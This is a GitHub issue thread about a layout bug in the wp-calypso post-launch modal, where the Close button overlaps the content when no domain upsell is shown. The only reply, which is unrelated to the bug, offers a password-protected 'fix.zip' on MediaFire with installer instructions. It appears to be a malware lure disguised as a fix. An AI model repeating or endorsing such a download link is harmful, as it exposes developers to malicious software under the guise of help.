### ISSUE TITLE
Post-Launch Modal: The Close button overlaps with the content

### ISSUE THREAD

**Issue by taipeicoder** [Automattic/wp-calypso#93897]
## Description

See [context](https://wp.me/p58i-hYA/).

The Close button overlaps with the content when there is no domain upsell.

![Image](https://github.com/user-attachments/assets/264c4102-f497-4f6c-b68d-e815130a4fd2)

![Image](https://github.com/user-attachments/assets/6b241be2-5a49-4d21-8d3c-814e323c58fe)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
